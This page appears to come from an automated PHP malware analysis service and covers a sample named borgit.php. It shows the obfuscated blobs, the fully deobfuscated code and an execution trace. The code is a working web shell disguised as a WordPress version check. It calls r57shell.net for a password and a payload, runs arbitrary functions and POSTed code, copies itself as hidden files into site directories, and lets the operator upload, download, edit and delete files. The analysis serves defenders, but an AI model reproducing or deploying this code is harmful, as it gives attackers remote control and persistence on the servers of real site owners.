PHP Malware Analysis
borgit.php
md5: 7c9f566f7be25b2daf6b716935c833d7
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
Environment
- getcwd (Deobfuscated, Traces)
Execution
Files
- file_get_contents (Deobfuscated, Traces)
- file_put_contents (Deobfuscated, Traces)
- move_uploaded_file (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
URLs
- http://r57shell.net/jquery.php?v=1.2&pwd=get (Deobfuscated)
- http://r57shell.net/jquery.php?v=1.2&request=enable (Deobfuscated, Traces)
- http://r57shell.net/mini_admin.txt (Deobfuscated)
Deobfuscated PHP code
<?php
$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA==";
$stt0 = "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";
eval /* PHPDeobfuscator eval output */ {
if (!function_exists("wp_core_version_check")) {
function wp_core_version_check()
{
$document_file = $_SERVER["SCRIPT_FILENAME"];
$request_uri = $_SERVER["REQUEST_URI"];
$parse_url = parse_url($request_uri);
$uri_path = $parse_url["path"];
$uri_path = dirname($uri_path);
$file_path = dirname($document_file);
$uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path);
if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') {
$document_root = $file_path;
} else {
$document_root = str_replace($uri_path, '', $file_path);
}
$hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]);
if (is_writable(sys_get_temp_dir())) {
$tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . '');
} else {
$tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . '');
}
if (@$_GET["slince_golden"]) {
echo "<!-- //Silence is golden. -->";
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
curl_close($ch);
} else {
$response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get");
}
if (md5(sha1(@$_GET["is"])) == $response) {
if (@$_GET["f"]) {
print_r($_GET["f"]($_GET["c"]));
}
if (@$_GET["m"]) {
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
curl_close($ch);
} else {
$response = file_get_contents("http://r57shell.net/mini_admin.txt");
}
$file_name_path = @$_GET["m"] . "gagal.php";
@file_put_contents($file_name_path, $response);
echo $file_name_path;
}
if (@$_POST["l"]) {
function basic_code_extensions($request)
{
$tmp = tmpfile();
$tmpf = stream_get_meta_data($tmp);
$tmpf = $tmpf["uri"];
fwrite($tmp, $request);
$ret = (include $tmpf);
fclose($tmp);
return $ret;
}
print_r(basic_code_extensions($_POST["l"]));
}
}
exit;
}
if (!file_exists($tmp_file)) {
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
$response = curl_exec($ch);
curl_close($ch);
} else {
$referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
$opts = array("http" => array("header" => array("Referer: {$referer}\r\n")));
$context = stream_context_create($opts);
$response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context);
}
@touch($tmp_file);
@file_put_contents($tmp_file, $response);
} else {
$response = file_get_contents($tmp_file);
if (!@preg_match("#stt1#", $response)) {
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
$response = curl_exec($ch);
curl_close($ch);
} else {
$referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
$opts = array("http" => array("header" => array("Referer: {$referer}\r\n")));
$context = stream_context_create($opts);
$response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context);
}
@touch($tmp_file);
@file_put_contents($tmp_file, $response);
}
}
$dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR));
foreach ($dirs as $d) {
$file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
@file_put_contents($file_name, $response);
$dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR));
foreach ($dirs as $d) {
if (!@preg_match("#wp-content#", $d)) {
$file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
@file_put_contents($file_name, $response);
}
}
}
}
wp_core_version_check();
}
echo "<table align=\"center\" width=\"400\" border=\"0\" cellspacing=\"1\" cellpadding=\"3\"><tr><td>PathNow: ";
if (isset($_GET["path"])) {
$path = $_GET["path"];
} else {
$path = getcwd();
}
$path = str_replace("\\", "/", $path);
$paths = explode("/", $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<a href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo "\">" . $pat . "</a>/";
}
echo "</td></tr><tr><td>";
if (isset($_FILES["up_file"])) {
$target_path = basename($_FILES["up_file"]["name"]);
if (move_uploaded_file($_FILES["up_file"]["tmp_name"], $path . "/" . $target_path)) {
echo "<font color=\"green\">file up!</font><br />";
} else {
echo "<font color=\"red\">up fail!</font><br />";
}
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\" action=\"?path={$path}\"><input name=\"up_file\" type=\"file\"/><input type=\"submit\" value=\"up File\"/></form></td></tr>";
function get($url, $dir)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$data = curl_exec($ch);
if (!$data) {
$data = @file_get_contents($url);
}
file_put_contents($dir, $data);
}
if ($_GET["url"]) {
$url = $_GET["url"];
preg_match("/(.*)\\/(.*)\\.(.*?)\$/", $url, $n);
if ($n[3] == "txt") {
$z = "php";
$name = $n[2];
} else {
$z = $n[3];
$name = "moban";
}
if ($_GET["dir"]) {
$dir = $_SERVER["DOCUMENT_ROOT"] . "/" . $_GET["dir"] . "/" . $name . "." . $z;
} else {
$dir = $_SERVER["DOCUMENT_ROOT"] . "/" . $name . "." . $z;
}
get($url, $dir);
if (file_exists($dir)) {
echo "<tr><td><font color=\"green\">download success</font></td></tr>";
} else {
echo "<tr><td><font color=\"red\">download fail</font></td></tr>";
}
} elseif ($_POST["url"]) {
$url = $_POST["url"];
preg_match("/(.*)\\/(.*)\\.(.*?)\$/", $url, $n);
if ($n[3] == "txt") {
$z = "php";
$name = $n[2];
} else {
$z = $n[3];
$name = "moban";
}
$dir = $_POST["path"] . "/" . $name . "." . $z;
get($url, $dir);
if (file_exists($dir)) {
echo "<tr><td><font color=\"green\">download success</font></td></tr>";
} else {
echo "<tr><td><font color=\"red\">download fail</font></td></tr>";
}
}
echo "<tr><td><form method=\"POST\" action=\"?path={$path}\"><span>Url: </span><input type=text name=\"url\" value=\"\"><input type=\"hidden\" name=\"path\" value=\"{$path}\"><input type=submit value=\"Download\"></form></td></tr>";
if (isset($_POST["edit_content"])) {
if (file_put_contents($_GET["filepath"], stripslashes($_POST["edit_content"]))) {
echo "Saved!";
} else {
echo "Not saved!";
}
}
if (isset($_GET["filepath"])) {
echo "<tr><td>Current File : ";
echo $_GET["filepath"];
echo "</tr></td></table><br />";
echo "<form action=\"\" method=\"post\"><textarea style=\"width:100%;height:300px;\" name=\"edit_content\">" . htmlspecialchars(file_get_contents($_GET["filepath"])) . "</textarea><input type=\"submit\"></form>";
} elseif (isset($_GET["check"]) && $_GET["check"] == "1") {
$RootDir = $_SERVER["DOCUMENT_ROOT"];
$filename = $RootDir . "/index.php";
echo "<tr><td>Current File : ";
echo $filename;
echo "</tr></td></table><br />";
echo "<pre>" . htmlspecialchars(file_get_contents($filename)) . "</pre>";
} else {
echo "</table><br /><center>";
if (isset($_GET["option"]) && $_GET["option"] == "delete") {
if (unlink($_GET["delfile"])) {
echo "<font color=\"green\">Delete File Done.</font><br />";
} else {
echo "<font color=\"red\">Delete File Error.</font><br />";
}
}
echo "</center>";
$scandir = scandir($path);
echo "<div id=\"content\"><table width=\"380\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr class=\"first\"><td>Name</td><td>Size</td><td>Options</td></tr>";
foreach ($scandir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == "." || $dir == "..") {
continue;
}
echo "<tr><td><a href=\"?path={$path}/{$dir}\">{$dir}</a></td><td>DIR</td><td>none</td></tr>";
}
echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
foreach ($scandir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . " MB";
} else {
$size .= " KB";
}
echo "<tr><td><a href=\"?filepath={$path}/{$file}&path={$path}\">{$file}</a></td><td>" . $size . "</td><td><a href=\"?path={$path}&delfile={$path}/{$file}&option=delete\">Delete</a></td></tr>";
}
echo "</table></div>";
}
};Execution traces
data/traces/7c9f566f7be25b2daf6b716935c833d7_trace-1676251545.4716.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:26:11.369442]
1 0 1 0.000162 393528
1 3 0 0.000293 402368 {main} 1 /var/www/html/uploads/borgit.php 0 0
1 A /var/www/html/uploads/borgit.php 2 $stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1 A /var/www/html/uploads/borgit.php 3 $stt0 = 'S6BO7Jw/iiHOQooN0/2uW73xCkrKK2FWce8AjWx+Im3/1KPRj6VV1I+MGYq5qq0xSSA3QvgCj6oShkhQ19Pwt9X80BtR3pcacOuuKQ6wYkyeoZW88+52HTPONeSLSoevrt1SjOzl6G8LXqjco4Kgr6R+rZrSB7uV5vXQ9pMmwLWDHMQGhg6YE1MWxNRAWOeeiuWC9abwEHCX4S1XyBH7fIvpT/f3v4gOqRKB3jETmtbLf6mSknPF3hIXTXJZZgVou0YvUZZdNw9nCpGBCJi1XAUTSOSkcJMrJUbKZBWSW99NE8h/qJxT93Kp5wGQVRDJpkCfDfNNZK2OEtSW70mFG7XpMVLGnIhXODhMaOZPoI/Z1p8XsvSj2ffuzLxUTIn2Syr0P86/vkluwAX0LWtsoJRjuDSg5O2dXXcaq6Q3iATVTwINKhZC5Ywjr+ckF5zio2LzosDROjLoA3+kJad3s8WXDHDonjFpRZfu6LMsw5f5fm8CpoRGr9+lofUMpVrD'
2 4 0 0.000382 402368 base64_decode 0 /var/www/html/uploads/borgit.php 4 1 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2 4 1 0.000409 402528
2 4 R 'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2 5 0 0.000437 402496 gzinflate 0 /var/www/html/uploads/borgit.php 4 1 'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2 5 1 0.000465 402624
2 5 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 6 0 0.000489 402464 htmlspecialchars_decode 0 /var/www/html/uploads/borgit.php 4 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 6 1 0.000510 402496
2 6 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 7 0 0.000545 404024 eval 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));' /var/www/html/uploads/borgit.php 4 0
3 8 0 0.000566 404024 strrev 0 /var/www/html/uploads/borgit.php(4) : eval()'d code 1 1 'S6BO7Jw/iiHOQooN0/2uW73xCkrKK2FWce8AjWx+Im3/1KPRj6VV1I+MGYq5qq0xSSA3QvgCj6oShkhQ19Pwt9X80BtR3pcacOuuKQ6wYkyeoZW88+52HTPONeSLSoevrt1SjOzl6G8LXqjco4Kgr6R+rZrSB7uV5vXQ9pMmwLWDHMQGhg6YE1MWxNRAWOeeiuWC9abwEHCX4S1XyBH7fIvpT/f3v4gOqRKB3jETmtbLf6mSknPF3hIXTXJZZgVou0YvUZZdNw9nCpGBCJi1XAUTSOSkcJMrJUbKZBWSW99NE8h/qJxT93Kp5wGQVRDJpkCfDfNNZK2OEtSW70mFG7XpMVLGnIhXODhMaOZPoI/Z1p8XsvSj2ffuzLxUTIn2Syr0P86/vkluwAX0LWtsoJRjuDSg5O2dXXcaq6Q3iATVTwINKhZC5Ywjr+ckF5zio2LzosDROjLoA3+kJad3s8WXDHDonjFpRZfu6LMsw5f5fm8CpoRGr9+lofUMpVrD'
3 8 1 0.000612 412248
